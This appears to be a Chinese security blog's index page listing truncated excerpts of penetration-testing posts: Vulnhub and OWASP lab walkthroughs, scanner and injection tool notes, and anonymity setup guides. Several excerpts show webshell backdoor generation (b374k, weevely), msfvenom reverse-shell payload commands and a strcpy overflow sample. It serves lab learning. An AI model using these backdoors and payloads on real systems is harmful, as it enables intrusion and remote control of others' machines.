zhaji001

原创 Game of Thrones : 权利的游戏

简介今年权利的游戏要上映最终季了，很是期待啊，争斗了那么久的权位，这次终于要和异鬼开打了。祝你好运，老神和新人会保护你！下载URL: https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/靶机使用：Virtualbox攻击机：kali linux0x001 信息收集kali linux 是物理机器，所以就费点事，...

原创 Vulnhub DeRKnStiNK

简介虚拟机下载： https://www.vulnhub.com/entry/derpnstink-1,221/靶机： 使用Virtualbox虚拟机导入OVA攻击机：kali linux 0x001  信息收集nmap扫描网络找到VM ip地址 nmap -sn 192.168.1.100-254Nmap scan report for 192.168.1.105H...

原创 owaspbwa之Bricks

简介 下载：https://sourceforge.net/projects/owaspbwa/files/GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide0x001 login #1 burp拦截修改提交 检查注入username=test'&passwd=test'&submit=Subm...

原创 Drunk Admin

简介：https://www.vulnhub.com/entry/drunk-admin-web-hacking-challenge-1,14/环境：VMware网络选择的桥接模式，根据自己的环境进行配置，攻击机：kali linux 靶机：Drunk Admin VM0x001 信息收集开机你将会看到靶机的IP地址，我的VM靶机地址为192.168.1.1040x...

原创 Vulnhub Bsides Vancouver 2018

简介： 靶机下载URL: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/#release虚拟机需要使用Virtualbox 直接导入VM, 攻击机器使用kali linux 如果你为了方便可不使用桥接模式，直接设置VM和kali在同一IP即可。如果在环境中有太多的机器就不太好分辨目标IP。0x001 信...

原创 xss发现到利用

前言xss的介绍就不多说了，搜索一下一大堆值得详细研究，有本书讲的挺透彻《XSS跨站脚本攻击剖析与防御》。如果你对前端的代码不是很了解或者不是太熟悉，那么使用自动化的工具进行模糊测试，是你不错的选择，burpsuite和wfuzz是你不错的选择，也包括一些漏扫工具。环境：攻击机：kali linux 靶机：owaspbwa资源： 你可以在这里找到Intruder Paylo...

原创 Nikto

简介https://cirt.net/https://github.com/sullo/nikto攻击机：kali linux靶机: bee-box扫描服务器nikto -h 192.168.1.106 #在没指定端口的情况下它会默认的扫描80nikto -h 192.168.1.106 -p 443 #指定端口 指定为范围（80-90）或逗号分隔列表（80,88,9...

原创 wpscan

简介WPScan是一个黑盒漏洞扫描程序。WPScan使用Ruby编程语言编写，可帮助检测安全配置，主题，插件和用户权限等问题。在Kali，Pentoo和Samurai WTF WPScan已预先安装。此工具是针对Wordpress的专用扫描器。https://wordpress.org/plugins/ose-wp-scan/github: https://github.com/wpsca...

原创 SqlMap

收集的一些技巧资源来之互联网-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段-s “” #保存注入过程到一个文件,还可中断，下次恢复在注入(保存：-s “xx.log”　　恢复:-s “xx.log” –r...

原创 WebShells

B374K:github:  https://github.com/b374k/b374k制作后门：php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9b374k shell packer 0.4.2Filename : myShell.phpPassword : myPassw...

原创 owaspbwa之WebGoat

简介 下载：https://sourceforge.net/projects/owaspbwa/files/GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide0x001 侦查PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 5...

原创 危险的HTTP PUT

Web服务器上启用了HTTP PUT方法，配置不当可以直接上传后门文件到服务器，直接getshell。测试环境：攻击机器：kali linux靶机：metasploitables20x001 判断#nmap 扫80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)|_http-server-heade...

原创 joomscan 用法

写在开头的clusterd 这个检查工具真的很很鸡肋，我搭建了四个环境去测试一个都识别不出来tomcat7+9,jboss7+6. 好无奈好无奈，小伙伴们看到就不要在折腾了。简介OWASP JoomScan项目OWASP Joomla！漏洞扫描程序（JoomScan）是一个开源项目，旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现，可以无缝轻松地...

原创 msfvenom备忘录

msfvenom -lLinuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfmsfvenom -p linux/x64/meterpreter/reverse...

原创 BlindElephant使用方法

简介BlindElephant Web应用程序指纹识别器GitHub : https://github.com/lokifer/BlindElephantBlindElephant Web应用程序指纹识别器尝试通过比较已知位置的静态文件与所有可用版本中这些文件的版本的预计算哈希值来发现（已知）Web应用程序的版本。该技术快速，低带宽，非侵入性，通用且高度自动化。0x001  ...

原创 bWAPP练习

简介虚拟机下载地址： https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/如果你想自己去部署环境：https://sourceforge.net/projects/bwapp/files/bee-box/bWAPP包含有100多个漏洞，包括OWASP Top10安全风险，很爽的PHPweb靶机。登录username:bee  pas...

原创 安装Anonsurf使Kali Linux匿名

简介https://dropall.github.io/2016-12-20-anonsurf-ip-spoofing/github: https://github.com/Und3rf10w/kali-anonsurf下载Anonsurf从GIT克隆anonsurfroot@kali:~# git clone https://github.com/Und3rf10w/kal...

原创 关于隐身tor

简介 （复制某站）请遵守网络安全法请勿用于非法用途Tor最近发布了一层新的安全保护。新的变更包括加密运算法、经过改良的身份验证和重新设计的目录系统。最重要的是，新的洋葱域名将更长，以使洋葱地址保持完全隐匿。首要须知：什么是Tor?如果您已经开始阅读这篇文章，您有可能听说Tor，并想知道您是否应该使用它。所以让我们从基本知识开始讲解：究竟什么是Tor？Tor是”洋葱路由器”（The ...

原创 渗透测试思维导图

原创 python正则表达式学习笔记

正则表达式学习资源:https://github.com/EbookFoundation/free-programming-books/blob/master/free-programming-books-zh.md正则表达例子：|    A|B  匹配 A或者B.    A.A  匹配  A.A 匹配任何字符 除了\n除外^   ^Demo  匹配字符串起始部分$  ...

原创 Nmap扫描

nmap简介 官方:https://nmap.org/  GitHub:https://github.com/nmap/nmap 参考指南:https://nmap.org/book/man.htmlNmap参数-A     全面扫描-v     增加详细级别-sP   Ping扫描-P0   零不是字母O  无Ping扫描-PS  TCP SYN Ping扫描-P...

原创 Web后门工具weevley

weevley简介Weevely是一款开源项目.只支持(PHP) Webshell,可以模拟类似Telnet的连接,Weevely支持HTTP和SOCKS代理并使用Tor匿名网络。开源 https://github.com/epinna/weevely3演示靶机 dvwa  Vulnerability: File Upload low生成后门weevely generate ...

原创 2017 owasp top 10

参考  http://www.owasp.org.cn/owasp-project/2017-owasp-top-10/靶机全家桶 https://sourceforge.net/projects/owaspbwa/ A1-注入注入非常常见例如:SQL,LDAP,XPath,OS命令,XML,SMTP,ORM等等.通过代码审计,扫描工具,手工测试等,可很快发现漏洞.产生这种漏洞的原...

原创 commix注入工具

commix简介commix是一款由python编写,开源自动化检测系统命令注入工具  https://github.com/commixproject/commixcommix 参数选项： -v 　　　　　　　　　　VERBOSE详细程度级别（0-1，默认值：0）。 --version　　　　 　　显示版本号并退出。 --output-dir=.. 　　设置...

原创 Web--WAF检测工具

WAFwaf是一个web应用的保护装置,入侵检测系统IDS,入侵阻止系统IPS.nmapnmap -p 80 --script http-waf-detect.nse www.baidu.comNmap scan report for www.baidu.com (61.135.169.125)Host is up (0.0042s latency).Other address...

原创 DNS侦查工具

DNS简介访问某网站的时候,我们只需要打开浏览器输入例如:www.baidu.com就可以解析到该网站.为了便于记住不需要输入长长的IP地址去访问,这时DNS把相对应的域名解析成IP地址,这就是DNS域名解析.关于域名域名的层次划分用点来分割,最低在左边,高的在右边.例如:www.baidu.com.域名服务是基于UDP实现端口号为53.子域名还划分国家,地区,组织.域名还需要...

原创 SQL注入

解释型语言和编译型语言:解释型语言:运行是由一个运行时组件解释语言代码并执行其中包含的指令语言.编译型语言:是由它的代码在生成可执行文件时换转成机器指令,然后在运行时直接由该语言的计算机处理器执行指令.从理论上讲,任何语言都可使用编译器或解释器或来执行,这种区别不是语言本身的内在特性,通常大多数语言仅通过上述其中一种方式执行.基于解释型语言的执行方式,产生了一系列叫做代码注入的漏洞....

原创 Web(一)基础学习

1.客户端确认－－服务器没有采用确认检查2.数据库交互－－SQL注入3.文件上传与下载－－路径遍历漏洞，保存型跨站点脚本4.显示用户提交的数据－－跨站点脚本5.动态重定向－－重定向与消息头注入攻击6.社交网络功能－－用户名枚举，保存型跨站点脚本7.登录－－用户名枚举，脆弱密码，能使用蛮力破解8.多阶段登录－－登录缺陷9.会话状态－－可推测出的令牌，令牌处理不安全...

原创 BeEF

官方：　https://beefproject.com/GitHub: https://github.com/beefproject/beefkali启动beef:/usr/share/beef-xss# ./beef [15:07:21][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].[15:07:21][*]...

原创 windows漏洞利用

编译运行 源代码：#include <stdio.h>greeting(char *temp1, char *temp2){ char name[400]; strcpy(name, temp2); printf("Hello %s %s\n", temp1, temp2);}main(int argc, char *argv[]){ greeting(ar...

原创 linux漏洞利用

缓存区溢出:EBP基址指针寄存器，ESP栈指针基础器.EBP指向进程的当前栈帧的底部，ESP总是指向栈顶．栈是从内存高地址处向低地址反向增长．#include <stdio.h>greeting(char *temp1, char *temp2){ char name[400]; strcpy(name, temp2); printf("Hello %s %s\...

原创 暴力破解工具

需要有一个强大的字典，如果太大了的话，计算机索引不过来，也是没用的．口令的破解全靠运气，运气好几秒钟，几分钟都有可能，运气不好一天二天解不开也正常.总要去尝试暴力破解，会影响机器的CPU,可能会导致拒绝服务的情况．而且还会有拒绝密码登陆这种情况．工具：https://github.com/tearsecurity/leviathanLeviathan是一个大规模审计工具包，具有广泛...

原创 欺骗伪装攻击

Ettercap ARP欺骗，Evilgrade DNS欺骗，Metasploit Responder NetBIOS LLMNR欺骗ARP欺骗：假扮网关，拦截任何要离开本地网络的流量．DNS欺骗：DNS名称到IP转换创建一个不正确的响应．能够欺骗用户从攻击者服务器获取恶意数据和用户访问恶意站点． Ettercap  ARP欺骗局域网中的windows７:ettercap　支持...

原创 汇编：AT&T与NASM的区别

寄存器：通用寄存器：EAX,EBX,ECX,EDX,  用于操作数据;AX,BX,CX,DX,寄存器的１６位版本；AH,BH,CH,DH,AL,BL,CL,DL寄存器的８位高位和低位字节；段寄存器：CS,SS,DS,ES,FS,GS,16位寄存器，存放着，内存地址的前半部分；存放着指向代码，栈和额外数据段的指针偏移寄存器：EBP,指向函数的本地环境的起始位置；　ESI,存放着使...

原创 Metasploit(学习笔记)

之前阅读了《Ｍetasploit渗透测试指南》准备更深入了解。ＭＳＦ终端命令： (kali 中Ｔab键自动补全）show exploits   列出框架中的渗透攻击模块show  payloads  列出框架中攻击载荷show auxiliary   列出框架中辅助攻击模块search  name  查找框架中攻击模块info 显示模块的信息use name  选择要使...

原创 CentOS+tor+Privoxy 服务搭建 + Ubuntu + tor+Privoxy服务搭建 + 匿名网站搭建

CentOS+tor+Privoxy 服务搭建(要出墙tor才可正常使用）：        sudo yum install epel-release  不然没有源        sudo yum install tor        service tor start  启动服务  检查服务状态 service tor status        sudo yum install...

原创 kali安装

建议不装虚拟机，毕竟要熟悉linux    去kali官方下载第一步：使用软碟通（别的制作工具一样） 写入U盘第二步：选择U盘启动，然后你就能看到久违的画面了 第三步：选择Craphical install  图像界面安装  （其它都是下一步了，英语还是中文 看你的选择了）第四步：如果对linux的硬盘分区不熟，可以向导安装，下一步，下一步就好了，密码设置完要牢记！还有重要一点...

原创 WEB基础学习

https://github.com/EbookFoundation/free-programming-books/blob/master/free-programming-books-zh.md 分享下GitHub 上的学习教材Burp Suite 实战指南 URL  https://t0data.gitbooks.io/burpsuite/content/XXS简介：（跨站脚本攻击）...

原创 CentOS7_Web_AXMPP_DVWA服务器搭建

CentoS7 搭建的DVWA   windows 搭建更简单  主要一点就是 JDK环境装上  因为tomcat 这只猫 需要JDK环境CentOS 官方下载地址：https://www.centos.org/    下载的标准版我在另一台PC上搭建    使用的VirtualBox虚拟机    网络配置是选择桥接网卡  和我主机同一网络下CentOS最好不要装图形界面 不然耗费...